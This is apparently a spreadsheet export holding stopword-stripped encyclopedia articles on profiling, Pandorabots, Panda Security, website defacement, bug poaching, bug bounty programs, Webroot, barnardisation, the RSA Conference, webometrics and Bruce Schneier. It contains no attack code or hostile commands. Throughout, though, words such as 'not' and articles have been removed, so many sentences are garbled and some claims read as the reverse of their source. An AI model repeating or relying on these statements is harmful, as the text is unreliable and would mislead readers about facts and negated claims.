online behavior, detection fraud them, deployment human resources pooling ranking skills. (leopold meints 2008)profiling also used support people work, also learning, intervening design adaptive hypermedia systems personalizing interaction. instance, useful supporting management attention (nabeth 2008). forensic science, possibility exists linking different databases cases suspects mining common patterns. this could used solving existing cases purpose establishing risk profiles potential suspects (geradts sommer 2008) (harcourt 2006). consumer profiling consumer profiling form customer analytics, customer data used make decisions product promotion, pricing products, well personalized advertising. when find profitable customer segment, consumer analytics draws demographic data, data consumer behavior, data products purchased, payment method, surveys establish consumer profiles. establish predictive models basis existing databases, knowledge discovery databases (kdd) statistical method used. groups similar customer data predict future consumer behavior. other methods predicting consumer behaviour correlation pattern recognition. consumer profiles describe customers based attributes typically consumers grouped according income, living standard, location. consumer profiles also include behavioural attributes assess customer's motivation buyer decision process. well known examples consumer profiles experian's mosaic geodemographic classification households, caci's acorn, acxiom's personicx. ambient intelligence built environment ambient intelligence everyday objects built-in sensors embedded systems allow objects recognise respond presence needs individuals. ambient intelligence relies automated profiling human–computer interaction designs. sensors monitor individual's action behaviours, therefore generating, collecting, analysing, processing storing personal data. early examples consumer electronics ambient intelligence include mobile apps, augmented reality location-based service. risks issues profiling technologies raised host ethical, legal issues including privacy, equality, process, security liability. numerous authors warned affordances technological infrastructure could emerge basis semi-autonomic profiling technologies (lessig 2006) (solove 2004) (schwartz 2000). privacy principal issues raised. profiling technologies make possible far-reaching monitoring individual's behaviour preferences. profiles reveal personal private information individuals might even aware (hildebrandt gutwirth 2008). profiling technologies nature discriminatory tools. they allow unparalleled kinds social sorting segmentation could unfair effects. people profiled higher prices, could miss important offers opportunities, increased risks catering needs less profitable (lyon 2003). cases aware this, since profiling practices mostly invisible profiles often protected intellectual property trade secret. this poses threat equality solidarity citizens. larger scale, might cause segmentation society.one problems underlying potential violations privacy non-discrimination process profiling often invisible profiled. this creates difficulties becomes hard, impossible, contest application particular group profile. this disturbs principles process: person access information basis withheld benefits attributed certain risks, cannot contest treated (steinbock 2005). profiles used people hands people entitled access information. important issue related breaches security identity theft. when application profiles causes harm, liability harm determined held accountable. software programmer, profiling service provider, profiled user held accountable? this issue liability especially complex case application decisions profiles also become automated like autonomic computing ambient intelligence decisions automated decisions based profiling. also references notes references</t>
  </si>
  <si>
    <t>Pandorabots</t>
  </si>
  <si>
    <t>pandorabots, inc. artificial intelligence company runs service building deploying chatbots. according website, 2019, 250,000+ registered developers used platform create 300,000+ chatbots, logging sixty billion conversational interactions end-users. pandorabots implements supports development aiml open standard makes portions code accessible free licenses like open apis. pandorabots platform "one oldest largest chatbot hosting services world." clients create "ai-driven virtual agents" hold human-like text voice chats consumers. technology products pandorabots provides access chatbot hosting platform, offers following sdks github: java, ruby, php, python, node.js. platform written allegro common lisp. notable chatbots include a.l.i.c.e. (alicebot): three time loebner-winner, open-source base personality bot, inspiration movie her; mitsuku. cases common cases include advertising, virtual assistance, e-learning, entertainment education. chatbots built hosted pandorabots appear messaging native apps, web, games, social networks, connected devices. academics universities platform teaching research. also richard wallace (scientist) references external links pandarabots website</t>
  </si>
  <si>
    <t>Building BloQs</t>
  </si>
  <si>
    <t>building bloqs open workshop enfield, london. social enterprise, emphasis creating maintaining space resources people make living craft. model response rising rental prices gentrification london. 2017, professional members, 10,000 square foot space, called "proof concept" 55,000 square foot space. that space part 200-acre, urban development project called meridian water. £2.7m project make building bloqs biggest open workshop europe.as september 2017, bloqs maintained studios tools metal woodworking, milling, laser cutting, textiles. their space also includes artist studio cafe, mostly flexible space. references external links official website open workshop network further reading great british make bloqs resident's experience place</t>
  </si>
  <si>
    <t>Panda Security</t>
  </si>
  <si>
    <t>panda security spanish cybersecurity software company specializes creating products security. panda security started antivirus software, company also provides develops cybersecurity software. this includes security products services businesses home users, well protection tools systems, networks, emails, private information. panda security employs people. overview 2005, panda security fourth largest antivirus vendor worldwide, 3.2% marketplace. november 2015 opswat measured panda security's market share 3.6%. company, whose shares previously 100% held mikel urizarbarrena, announced april 2007 sale shares southern european investment group investindustrial private equity firm gala capital. july 2007 company changed name panda software panda security urizarbarrena replaced jorge dinares. almost year later, june 2008, amidst flagging sales, board directors voted replace dinares juan santana, ceo. santana resigned september 2011 replaced josé sancho acting ceo.panda security rated 2018 gartner analysts endpoint protection visionary. technological milestones include launch security systems, saas concept (security service) antivirus solutions provide protection cloud (cloud computing) based panda calls collective intelligence, security model panda introduced market 2007. according ceo, main benefit security model provides allows automatic scanning threats instead manual scans carried companies.the firm subsidiaries italy, switzerland, germany, austria, belgium, netherlands, france, sweden, finland, spain, japan. additionally, franchises another countries. subsidiary moved headquarters orlando, florida 2009.in late 2009, panda security created partnership trust help fight viruses.panda previously embroiled lawsuit channel partners, external technologies, inc. 2013, panda prevailed lawsuit external technologies, recovering judgment excess $100,000 prevailing claims asserted external panda. august 2010, office location menlo park, california publicly announced panda's twitter account.in 2012, firm tenth largest antivirus vendor worldwide, 2.0% marketplace.in march 2020, seattle-based network security firm watchguard announced entered agreement acquire panda security. products truprevent, introduced 2003, firm's technologies proactive protection, opposed traditional antivirus products, provide reactive protection. offers generic protection many techniques used malware, policies rules developed based vulnerabilities appear daily. collective intelligence" firm's protection system automatically detect, scan classify malware real time, introduced 2007 this technology implemented 2009 2010 antivirus products home users panda cloud antivirus, company classified first antivirus history provides protection cloud ratings 2015, panda security obtained best rate protection real world protection test av-comparatives. 2018, panda antivirus received gold award [av-comparatives]. whole product dynamic "real-world" protection test. panda security named company year 2016 leading spanish newspaper suplemento innovative work, growth outreach history. panda adaptive defense first endpoint detection response (edr) security solution achieve eal2+ security certification common criteria standard, published (official state bulletin) 2018. listed "qualified security product" spanish national cryptologic center 2018.in 2016 named best advanced persistent threat (apt) solution computing magazines security excellence awards. 2018 recognised a-list security product second year running, received editor's choice award calling "smarter average protection solution" also antivirus software comparison antivirus software comparison computer viruses internet security panda cloud antivirus references external links official website</t>
  </si>
  <si>
    <t>Website defacement</t>
  </si>
  <si>
    <t>website defacement attack website changes visual appearance website page. these typically work defacers, break server replace hosted website own. defacement generally meant kind electronic graffiti and, like forms vandalism, used spread messages politically motivated "cyber protesters" hacktivists. website defacement involve adding questionable content removing changing content make questionable, including nonsensical whimsical references websites publicly editable repositories harm reputation. methods shell used website defacement. common targets religious government sites regularly targeted hackers order display political religious beliefs, whilst defacing views beliefs others. disturbing images offensive phrases might displayed process, well signature sorts, show responsible defacement. websites defaced political reasons; many defacers thrill. example, online contests hackers awarded points defacing largest number sites specified amount time. corporations also targeted often websites world wide often seek take measures protect defacement hacking general. websites represent image company organisation therefore suffer significant losses defacement. visitors lose faith sites cannot promise security become wary performing online transactions. after defacement, sites shut repairs security review, sometimes extended period time, causing expenses loss profit value. also computer crime cybercrime vandalism vandalism wikipedia references external links screenshot website defacement attrition.org's mirror defaced websites</t>
  </si>
  <si>
    <t>BuggedPlanet</t>
  </si>
  <si>
    <t>buggedplanet.info wiki created 2011 andy müller-maguhn, former spokesman chaos computer club, tries list track activities surveillance industry fields "lawful interception", signals intelligence (sigint), communications intelligence (comint) well tactical strategical measures used intercept communications vendors governmental private operators technology.the site maintains list vendors cyberweapons surveillance technologies well "country knowledgebase" aims accumulate country-specific news, activities vendors topic. special focus placed vendors sell technologies undemocratic countries related lobbying efforts. files december 2011 privacy international wikileaks collaborated buggedplanet released documents collected number surveillance trade shows conferences included brochures, catalogues, technical specifications, contracts pricelists products around companies. also cyber-arms industry mass surveillance industry wikileaks external links official website references</t>
  </si>
  <si>
    <t>Bug poaching</t>
  </si>
  <si>
    <t>poaching cyberextortion tactic hacker breaks corporate network creates analysis network’s private information vulnerabilities. hacker contact corporation evidence breach demand ransom. operation unlike typical ransomware attack, information stolen, poacher extort company information system breached, rather stolen data itself. security found poaching campaign targeted approximately companies last year (june 2016) don’t bounty programs. recovery files poachers demanded $30,000 share breached system. poachers immediately destroy release stolen data. some choose poachers since typically release stolen data. however, need hope data leaked. grey technique? ethical hacking often described white alternative often termed black hat. poaching uses unethical behavior requesting ransom however uses technique alerting company often used ethical hackers. therefore attributes fitting least definition grey-hat. references</t>
  </si>
  <si>
    <t>Bug bounty program</t>
  </si>
  <si>
    <t>bounty program deal offered many websites, organizations software developers individuals receive recognition compensation reporting bugs, especially pertaining security exploits vulnerabilities. these programs allow developers discover resolve bugs general public aware them, preventing incidents widespread abuse. bounty programs implemented large number organizations, including mozilla, facebook, yahoo!, google, reddit, square, microsoft, internet bounty.companies outside technology industry, including traditionally conservative organizations like united states department defense, started using bounty programs. pentagon's bounty programs part posture shift seen several government agencies reverse course threatening white hackers legal recourse inviting participate part comprehensive vulnerability disclosure framework policy. history hunter ready initiated first known bounty program 1983 versatile real-time executive operating system. anyone found reported would receive volkswagen beetle (a.k.a. bug) return.a little decade later 1995, jarrett ridlinghafer, technical support engineer netscape communications corporation coined phrase 'bug bounty'.netscape encouraged employees push whatever takes done. ridlinghafer recognized netscape many product enthusiasts evangelists, could even considered fanatical netscape's browsers. started investigate phenomenon detail discovered many netscape's enthusiasts actually software engineers fixing product's bugs publishing fixes workarounds, either online news forums netscape's technical support department, unofficial "netscape u-faq" website, listed known bugs features browser, well instructions regarding workarounds fixes. ridlinghafer thought company leverage resources proposed 'netscape bugs bounty program', presented manager, turn suggested ridlinghafer present next company executive team meeting. next executive team meeting, attended james barksdale, marc andreessen every department including product engineering, member given copy 'netscape bugs bounty program' proposal ridlinghafer invited present idea netscape executive team. everyone meeting embraced idea except engineering, want forward believing waste time resources. however, engineering overruled ridlinghafer given initial $50k budget proposal. october 1995, netscape launched first technology bounty program netscape navigator beta browser. vulnerability disclosure policy controversy august 2013, palestinian computer science student reported vulnerability allowed anyone post video arbitrary facebook account. according email communication student facebook, attempted report vulnerability using facebook's bounty program student misunderstood facebook's engineers. later exploited vulnerability using facebook profile mark zuckerberg, resulting facebook refusing bounty. facebook started paying researchers find report security bugs issuing custom branded "white hat" debit cards reloaded funds time researchers discover flaws. "researchers find bugs security improvements rare, value find ways reward them," ryan mcgeehan, former manager facebook's security response team, told cnet interview. "having exclusive black card another recognize them. they show conference show card special work facebook.'" 2014, facebook stopped issuing debit cards researchers. 2016, uber experienced security incident individual accessed personal information million uber users worldwide. individual supposedly demanded ransom $100,000 order destroy rather publish data. congressional testimony, uber ciso indicated company verified data destroyed paying $100,000. flynn expressed regret uber disclose incident 2016. part response incident, uber worked partner hackerone update bounty program policies among things, thoroughly explain good faith vulnerability research disclosure.yahoo! severely criticized sending yahoo! t-shirts reward security researchers finding reporting security vulnerabilities yahoo!, sparking came called t-shirt-gate. high-tech bridge, geneva, switzerland-based security testing company issued press release saying yahoo! offered $12.50 credit vulnerability, could used toward yahoo-branded items t-shirts, cups pens store. ramses martinez, director yahoo's security team claimed later blog post behind voucher reward program, basically paying pocket. eventually, yahoo! launched bounty program october year, allows security researchers submit bugs receive rewards $250 $15,000, depending severity discovered.similarly, ecava released first known bounty program 2013, criticized offering store credits instead cash incentivize security researchers. ecava explained program intended initially restrictive focused human safety perspective users integraxor scada, software. geography though submissions bounties come many countries, handful countries tend submit bugs receive bounties. united states india countries researchers submit bugs. india, either first second largest number hunters world, depending report cites, topped facebook bounty program largest number valid bugs. "india came number valid submissions 2017, united states trinidad tobago second third place, respectively", facebook quoted post. notable programs october 2013, google announced major change vulnerability reward program. previously, bounty program covering many google products. with shift, however, program broadened include selection high-risk free software applications libraries, primarily designed networking low-level operating system functionality. submissions google found adherent guidelines would eligible rewards ranging $500 $3,133.70. 2017, google expanded program cover vulnerabilities found applications developed third parties made available google play store. google's vulnerability rewards program includes vulnerabilities found google, google cloud, android, chrome products, rewards $31,337.microsoft facebook partnered november 2013 sponsor internet bounty, program offer rewards reporting hacks exploits broad range internet-related software. 2017, github ford foundation sponsored initiative, managed volunteers including uber, microsoft, facebook, adobe, hackerone, github, group, signal sciences. software covered includes adobe flash, python, ruby, php, django, ruby rails, perl, openssl, nginx, apache http server, phabricator. addition, program offered rewards broader exploits affecting widely used operating systems browsers, well internet whole.in march 2016, peter cook announced federal government's first bounty program, "hack pentagon" program. program april 1,400 people submitted unique valid reports hackerone. total, department defense paid $71,200.in 2019, european commission announced eu-fossa bounty initiative popular open source projects, including drupal, apache tomcat, vlc, 7-zip keepass. project co-facilitated european bounty platform intigriti hackerone resulted total unique valid vulnerabilities.open bounty crowd security bounty program established 2014 allows individuals post website application security vulnerabilities hope reward affected website operators. center analysis investigation cyber attacks (tsarka), cybersecurity company kazakhstan, december 8th, 2021, launched national vulnerability reward program called bugbounty.kz. among private companies, governmental information systems information resources joined program. since launch october 28th, 2021, 1039 vulnerability reports submitted. during operation program several critical vulnerabilities reported could personal data leak critical infrastructure possible manipulation scada systems responsible city life support. also bounty hunter cyber-arms industry knuth reward check (program 1980) list unsolved problems computer science list unsolved problems mathematics market zero-day exploits open-source bounty white (computer security) zerodium references</t>
  </si>
  <si>
    <t>Website correlation</t>
  </si>
  <si>
    <t>website correlation, website matching, process used identify websites similar related. websites inherently easy duplicate. this proliferation identical websites similar websites purposes ranging translation internet marketing (especially affiliate marketing) internet crime locating similar websites inherently problematic different languages, different servers, different countries (different top-level domains). uses website correlation used internet investigations determine overall scope investigation market research locate competitors determine market reach competing companies cluster sampling filtering systems ensure websites specific type blocked view data mining systems maximize input output data risk management programs ensure websites monitored problems introduce fiscal risk compliance monitoring part compliance ethics program policy ensure websites follow established guidelines correlation types there several known types correlation, demonstrating different strengths weaknesses. practical website correlation process require combining methods. similar structure save time effort, website owners duplicate major portions website code across many domains. similarity code structure provide enough information correlation. organizations known publicly search-able databases kind correlation include: http://www.delineal.comnote: websites sometimes utilize structure relationship websites coincidentally utilize content management system). same server subnet also known correlated reverse lookup. websites served server, address, subnet. several organizations retain archives address data correlate data. examples include: http://www.domaintools.comnote: correlation method misleading websites frequently exist server (aka shared hosting) relationship other. same owner websites authored person organization. website owners required provide contact information registrar obtain domain name. domain ownership determined whois protocol provides mechanism searching correlating ownership. several organizations retain archives whois information provide searching correlation services. examples include: http://whoisology.com http://www.domaintools.comnote: website ownership information falsified, outdated, hidden public view. website correlation method accurate, misleading, impossible depending information contained whois records. similar content search engines provide search-able databases indexed website content. search engine results lists correlated content similarity. google google.com type 'related:website_name_here.com' find websites related name phrases find unique-sounding phrase website search engine(s) locate phrase literally websites search box, place quotes around phrase literal phrase search instead copyright 2010 xyzcompany "copyright 2010 xyzcompany"note: this method correlation inherently slow must guess phrases search for. also, related websites contain literally similar content site translated another language). same category websites frequently categorized tagged similarly automated manual means. examples publicly accessible website categorization databases include: http://www.similarsitesearch.com/ http://similarsites.com http://similarsites.de http://www.similarsitecheck.com http://www.similarto.us dmoznote: manual categorization (metadata) methods inherently subjective. automated categorization tagging methods inherently subject varying weaknesses strengths underlying categorization algorithms. same tracking tracking ids, used analytics affiliate identification frequently embedded website code. these used correlation imply common management websites. publicly available websites correlating tracking include: http://ewhois.com references</t>
  </si>
  <si>
    <t>Webroot</t>
  </si>
  <si>
    <t>webroot inc. american privately-held cybersecurity software company provides internet security consumers businesses. company founded boulder, colorado, headquartered broomfield, colorado, operations mateo diego, globally australia, austria, ireland, japan united kingdom. history webroot founded july 1997 steven thomas girlfriend boulderite kristen tally launched webroot's first commercial product, trace removal agent called webroot window washer. investors include venture capital firms technology crossover ventures, accel partners mayfield. 2002, webroot launched spyware blocking removal product called webroot sweeper. company introduced antivirus protection launch sweeper antivirus 2006. october 2007, webroot antivirus antispyware desktop firewall released added firewall protection feature.webroot entered enterprise market 2004 launch webroot sweeper enterprise, combined sweeper technology enables administrators deploy antispyware protection across entire network.in october 2008, webroot launched first consumer security suite, webroot internet security essentials, united states. international release security suite followed early 2009.in august 2009, webroot appointed president ceo, former wily technology.in 2010 webroot announced plans open international headquarters dublin, ireland. july 2010 webroot internet security complete 2011 released, including antivirus antispyware protection, firewall capabilities, online back-up, password management licensed lastpass, protection identity theft credit card monitoring customers.in september 2010 webroot opened regional office leidschendam, netherlands primarily aimed distributing webroot's enterprise security-as-a-service (saas) products businesses.webroot mobile security android launched april 2011 smartphones tablets, free basic version paid premium version. designed protect viruses apps, threats delivered browsing threats created mobile devices lost. secureanywhere products launched october 2011, mobile security offerings expanded include mobile operating system.in october 2011 webroot launched generation products, using prevx cloud technology. this included three basic products windows (secureanywhere antivirus, essentials complete 2012) security android mobile devices. february 2012 products businesses added.in july 2014 webroot announced brightcloud security services, portfolio services enterprise-class businesses, including integration next-generation firewalls siems.in september 2017, webroot appointed president ceo, former lancope mike potts.on february 2019 carbonite, inc. announced entered definitive agreement acquire webroot. march 2019, carbonite closed acquisition webroot, purchase price $618.5 million cash. acquisitions partnerships november 2007, webroot acquired uk-based email systems (ems) announced provider security software-as-a-service (saas) market. december 2009, webroot announced partnership virtual private network software provider anchorfree. version without advertisements anchorfree's software protection webroot's antivirus antispyware software produced.in march 2010, webroot announced acquisition swedish corporate internet security company, email systems scandinavia (ess).in july 2010, webroot acquired diego, california-based content classification security services provider, brightcloud, adding reputation content classification technology existing products.in november 2010, webroot acquired cloud-based anti-malware company, prevx.in july 2011 partnership struck global distribution firm tech data, making webroot products available tech data's network 125,000 channel partners countries around world.in july 2013, webroot security formed partnership enhance firms' real-time phishing detection.in september 2016 webroot acquired assets cyberflow analytics, company applying data science network anomaly detection.in february 2019 webroot announced would acquired carbonite. march 2019, carbonite confirmed purchase.in december 2019 carbonite acquired opentext. reviews av-comparatives gave nine vendors, including webroot, highest award july 2012 anti-phishing test, webroot took place among products tested efficacy blocking phishing websites. av-comparatives's performance test october 2012, webroot best pcmark score, lightest impact products tested windows 64-bit machine.webroot worst results products tested av-comparatives september 2012 file detection test malicious software, terms malware detection rates false alarms. webroot detected less percent viral samples, much worse 94.4 percent rate second-lowest detecting product. webroot inappropriately flagged clean files, raising many false positives products tested combined. according av-comparatives, "results misses confirmed several tests also vendor."pc magazine awarded webroot secureanywhere times editor's choice security product year, highest award given security software programs. magazine's test 2013, webroot found magazine staff best score malware blocking tests, malware removal tests, speed scans, installation speed. 2014 test, pcmag found "webroot's detection rate percent overall malware cleanup score points tops among products tested using malware collection."gartner listed webroot visionary quadrant 2014 assessment endpoint protection platforms.in 2014, passmark software, software hardware performance benchmarking company, benchmarked webroot secureanywhere business endpoint protection webroot secureanywhere antivirus using performance metrics. tests, webroot products found outperform competitors variety metrics, including scan times, usage, others, earning highest overall score tests. during november 2016's evaluation mobile security products android av-test given webroot's secureanywhere mobile product "protection score" placing near bottom products evaluated test terms protection malware. both "detection latest android malware real-time" "detection latest android malware discovered last weeks" scores "industry average" score.in october 2017, av-comparatives performed "head-to-head comparison" products vipre webroot, webroot secureanywhere product able achieve 86.4% "protection rate", compared vipre cloud's 100% rate. test performed using test live malicious urls found field.during january 2018 test various android antimalware apps av-comparatives, webroot security premier detected 99.7% antimalware samples, placing tested apps showed better detection rates. also antivirus comparison antivirus software comparison computer viruses software service references external links official website</t>
  </si>
  <si>
    <t>PicketLink (software)</t>
  </si>
  <si>
    <t>Barnardisation</t>
  </si>
  <si>
    <t>barnardisation method statistical disclosure control tables counts. involves adding internal non-zero cells table pseudo-random fashion. probability adjustment internal cell calculated (add (leave is), (subtract table totals calculated post-adjustment internal counts. etymology technique barnardisation appears named professor george alfred barnard (1915–2002), professor mathematics university essex. barnard, time president royal statistical society, three fellows appointed council royal statistical society help provide government-commissioned review data security 1971 census. resulting report questioned whether rounding small numbers nearest five best approach preserving respondent confidentiality.: para 3.3.8 formal government response report noted additional safeguard small random adjustments introduced 1971 census, suggestion explicitly attributed professor barnard,: para 4.20 footnote scientist article dated july 1973. muddying waters slightly, 1973 paper journal royal statistical society discussing safeguard reported "after much discussion, variant procedure suggested canada adopted.": p.520 presumably professor barnard involved discussions, inventor variant. case, evidence found safeguard applied canada, statistics canada seeming stick instead random rounding counts nearest p.13 despite originating prof barnard, documentation surrounding 1971 census method adjustmment known barnardisation simply described 'procedure'; 'adjustment values'; 'special procedure'; 'process random error injection'; 'modification' 'adjustment'.the earliest term 'barnardisation' found print dates office population censuses surveys working paper written hakim 1979, term mentioned without citation, without ascribing prof barnard. but, time, hakim's coinage term appears either widely overlooked widely ignored, least print, demonstrated wide range later publications already cited above. term 'barnardisation' appear remerged print 1995 publication stan openshaw's census users' handbook, used separate chapter authors index compiler. however, least late 1980s term already widespread conversational usage academic conferences meetings. more recently term 'barnardisation' also become firmly ensconced lexicon official reports produced official statistical agencies others. operational details originally conceived implemented 1971 census, barnardisation added characteristic pairing tables separate areas, applying equal opposite adjustments areas. example, given table cell area value increased paired area equivalent table cell would value reduced (subject making value negative). purpose pairing cancel out, much possible, amount noise introduced barnardisation process aggregate level.for 1991 census pairing areas prior application barnardisation dropped; detailed local base statistics, scope extended include adjustments achieved applying adjustment twice.in united kingdom, barnardisation became increasingly employed public agencies order enable provide information statistical purposes without infringing information privacy rights individuals information relates (e.g. cases involved modifications barndardisation procedure. example, implemented common service agency, adjustments applied counts whilst counts instead left unchanged, adjusted addition +1.: para pros cons review statistical disclosure control methods 2011 census identified following list pros/cons barnardisation point-of view data provider: advantages easy understand easy implement table totals consistent internal cell values adjustment unbiaseddisadvantages leads inconsistent values cell counts table totals present separately barnardised tables adjustment unpicked differencing tables available share counts totals, provide unadjusted total larger spatial area within barnardised tables nest probability adjustment used typically small, meaning many cell values left unadjustedfrom user point-of-view, another advantage barnardisation shown smaller impact typical user analyses following statistical disclose control measures: random rounding base used statistics canada; random rounding base used statistics zealand; small cell adjustment, used various points time office national statistics australian bureau statistics. efficacy reappraised since late 1990s concerns efficacy barnardisation protecting confidentiality increased point longer recommended tool, rather technique used special circumstances. this change attitudes appears centre around relatively high probability barnardisation leave small count particular unadjusted and, secondarily, dangers reverse engineering original value sufficient overlapping barnardised tables released. reasons censuses 2001 onwards abandoned barnardisation. spicer good review 2001, 2011 2021 alternatives barnardisation adopted, rationale this,. question whether barnardisation fall short complete anonymisation data, status barnardised data complex provisions data protection 1998, considered scottish information commissioner. some aspects initial decision commissioner overturned appeal house lords, commissioner invited revisit original decision. commissioner's final decision ruled barnardisation provided insufficient disclosure protection rare events case, childhood leukaemia), reversing part original decision: "the barnardised data, themselves, lead identification, [...] effect barnardisation actual figures, least deployed csa, effect concealing disguising data [the commissioner] originally considered would.": para however, written decision commissioner offered statistical justification assertion. instead commissioner's decision centred mainly around addressing points relating nature original barnardised data, related legal definitions (sensitive) personal data. references</t>
  </si>
  <si>
    <t>RSA Conference</t>
  </si>
  <si>
    <t>conference series security conferences. approximately 45,000 people attend conferences year. founded 1991 small cryptography conference. conferences take place united states, europe, asia, united arab emirates year. conference also hosts educational, professional networking, awards programs. history early history name refers public-key encryption technology developed data security, inc., founded 1982. abbreviation stands rivest, shamir, adleman, inventors technique. idea first conference conceived 1991 phone call security bidzos executive director electronic privacy information center. first conference panel, called "des dss: standards choice." focused attendees adopt dss, standard expected challenge security's status facto standard digital signatures.: 22–23 event steadily grew 1993 attracted attendees.: known many years data security conference, eventually became conference. over time conference grew business-oriented older demographic vendors, competitive issues time 1990s; european competitors security sometimes could booth, hired people pass flyers conference encouraging attendees visit hotels nearby. 1995 conference criticized clipper chip. implemented, chip would given u.s. government direct access evidence telecommunications devices chip installed. conference posters "sink clipper" letters. 1997 conference grown 2,500 attendees. first european conference took place 2000 started tracks.according network world conference's focus expanded cryptography broader security conference larger attendance 2005, microsoft bill gates keynote presentation. according bidzos, purpose conference became "for kinds things: drive standards, organize opposition government policies, promote name, [and] give customers opportunity".: 2008 conference 17,000 attendees participating security vendors. tracks sessions. recent history 2010 conference, obama administration publicly revealed comprehensive national cybersecurity initiative (cnci), created 2008 formerly kept secret. 2011, california-based security company, hbgary, withdrew speaking exhibiting conference, citing safety concerns. company announced plans reveal identities members hacktivist group anonymous received retaliatory threats hacks. 2014, speakers boycotted conference sponsor, security, accused adding backdoor products, national security agency could monitor users security technology. boycott began f-secure chief technology officer mikko hyppönen. wanted security apologize, whereas company's statement allegations true. some noted conference security company loosely connected. discussion year's conference focused heavily leaks edward snowden involvement american technology companies.the first conference asia-pacific introduced 2013. this followed inaugural united arab emirates conference years later. 2015 conference added clause exhibitor contracts effectively prohibiting "booth babes" requiring professional attire exhibitor floor. policy implemented response feedback booth babes made conference feel unprofessional. fortune magazine called widespread practice booth babes professional conferences "outdated" unwelcoming female attendees. following year, conference focused fbi–apple encryption dispute, regarding attempts government gain access iphones containing evidence criminal investigations.as 2017, conference estimated 40,000–43,000 attendees united states.on november 2020, announced 2021 conference, first time, held 100% virtually, concerns covid-19. content conference international conference series security takes place united states, europe, asia/japan, united arab emirates. also provides internet safety education consumers children, security scholar program security students, operates award programs typically bestowed conferences. example, award innovation sandbox contest, involves startups present technology panel judges.the 2017 conference u.s. keynotes, speakers, sessions, exhibitors. analysis session keywords conference suggest early conferences focused cryptography commerce, topical focus conferences transitioned cloud cybersecurity early 2000s. each conference theme, practice began 1995. additionally, typically security topics conference organizers pick focus year.speaking positions conference highly competitive, thousands submissions hundred speaking positions. conference awards conference provides annual awards recognize outstanding people organizations following areas following awards: award excellence mathematics (officially called conference award excellence mathematics) information security public policy humanitarian servicewinners announced opening keynote sessions conference april year. recent winners include jenkin, michael assante, canetti, rafail ostrovsky michael rogers. references external links official website</t>
  </si>
  <si>
    <t>Webometrics</t>
  </si>
  <si>
    <t>science webometrics (also cybermetrics) tries measure world wide knowledge number types hyperlinks, structure world wide using patterns. according björneborn ingwersen, definition webometrics "the study quantitative aspects construction information resources, structures technologies drawing bibliometric informetric approaches." term webometrics first coined almind ingwersen (1997). second definition webometrics also introduced, "the study web-based content primarily quantitative methods social science research goals using techniques specific field study", emphasizes development applied methods wider social sciences. purpose alternative definition help publicize appropriate methods outside information science discipline rather replace original definition within information science. similar scientific fields are: bibliometrics, informetrics, scientometrics, virtual ethnography, mining. relatively straightforward measure "web impact factor" (wif) introduced ingwersen (1998). measure defined number pages site receiving links sites, divided number pages published site accessible crawler. however disregarded mathematical artifacts derived power distributions variables. other similar indicators using size institution instead number webpages proved useful. also altmetrics impact factor pagerank network mapping search engine webometrics ranking world universities references bibliography tomas almind peter ingwersen (1997). "informetric analyses world wide web: methodological approaches 'webometrics'". journal documentation. (4): 404–426. citeseerx 10.1.1.137.7179. doi:10.1108/eum0000000007205. björneborn, lennart ingwersen, peter (2004). "toward basic framework webometrics". journal american society information science technology. (14): 1216–1227. doi:10.1002/asi.20077. archived original 2012-12-16. peter ingwersen (1998). "the calculation impact factors". journal documentation. (2): 236–243. doi:10.1108/eum0000000007167. mike thelwall; liwen vaughan; lennart björneborn (2005). "webometrics". annual review information science technology. 81–135. doi:10.1002/aris.1440390110. thelwall, mike (2009). introduction webometrics: quantitative research social sciences. synthesis lectures information concepts, retrieval, services. vol. morgan claypool. 1–116. doi:10.2200/s00176ed1v01y200903icr004. isbn 978-1-59829-993-9. mazalov, vladimir; pechnikov, andrey; chirkov, alexandr; chuyko, julia (2010). "web-communicator creation costs sharing problem cooperative game russian)" (pdf). управление большими системами: сборник трудов.ingwersen, peter (2006). "webometrics: years expansion".</t>
  </si>
  <si>
    <t>Bruce Schneier</t>
  </si>
  <si>
    <t>bruce schneier born january 1963) american cryptographer, computer security professional, privacy specialist, writer. schneier lecturer public policy harvard kennedy school fellow berkman klein center internet society november, 2013. board member electronic frontier foundation, access now, project; advisory board member electronic privacy information center verifiedvoting.org. author several books general security topics, computer security cryptography squid enthusiast.in 2015, schneier received epic lifetime achievement award electronic privacy information center. early life bruce schneier martin schneier, brooklyn supreme court judge. grew flatbush neighborhood brooklyn, york, attending p.s. hunter college high school.after receiving physics bachelor's degree university rochester 1984, went american university washington, d.c. master's degree computer science 1988. awarded honorary ph.d university westminster london, england november 2011. award made department electronics computer science recognition schneier's 'hard work contribution industry public life'. schneier founder chief technology officer counterpane internet security (now managed security solutions). worked acquired resilient systems schneier left june 2019. writings computer security general security 1991, schneier laid started writing computer magazines. later decided write book applied cryptography "since book existed". took articles, wrote proposal john wiley bought proposal.in 1994, schneier published applied cryptography, details design, use, implementation cryptographic algorithms. "this book allowed write more, start consulting, start companies, really launched expert field, really else written book. wanted read write happened really lucky time everything started explode internet".in 2010 published cryptography engineering, focused cryptography real systems less internal design. also written books security broader audience. 2000, schneier published secrets lies: digital security networked world; 2003, beyond fear: thinking sensibly about security uncertain world; 2012, liars outliers: enabling trust society needs thrive; 2015, data goliath: hidden battles collect your data control your world.schneier writes freely available monthly internet newsletter computer security issues, crypto-gram, well security weblog, schneier security. blog focuses latest threats, thoughts. weblog started publish essays appeared crypto-gram, making possible others comment stories still current, time newsletter became monthly email version blog, re-edited re-organized. schneier frequently quoted press computer security issues, pointing flaws security cryptographic implementations ranging biometrics airline security september attacks.schneier revealed blog december 2004 issue sigcse bulletin, three pakistani academics, khawaja amer hayat, umar waqar anis, tauseef-ur-rehman, international islamic university islamabad, pakistan, plagiarized article written schneier published. academics subsequently plagiarized another article ville hallivuori "real-time transport protocol (rtp) security" well. schneier complained editors periodical, generated minor controversy. editor sigcse bulletin removed paper website demanded official letters admission apology. schneier noted blog international islamic university personnel requested close comments blog entry"; schneier refused close comments blog, delete posts deemed "incoherent hostile". viewpoints blockchain schneier warns misplaced trust blockchain lack cases, calling blockchain solution search problem."what blockchain shift trust people institutions trust technology. need trust cryptography, protocols, software, computers network. need trust absolutely, they’re often single points failure." "i’ve never seen legitimate case blockchain. i’ve never seen system blockchain provides security impossible provide way."he goes cryptocurrencies useless used speculators looking quick riches. cryptography schneier, peer review expert analysis important security cryptographic systems. mathematical cryptography usually weakest link security chain; effective security requires cryptography combined things.the term schneier's coined cory doctorow 2004 speech. phrased person invent security system clever can't think break attributes bruce schneier, wrote 1998: "anyone, clueless amateur best cryptographer, create algorithm can't break. it's even hard. what hard creating algorithm else break, even years analysis."similar sentiments expressed others before. codebreakers, david kahn states: "few false ideas firmly 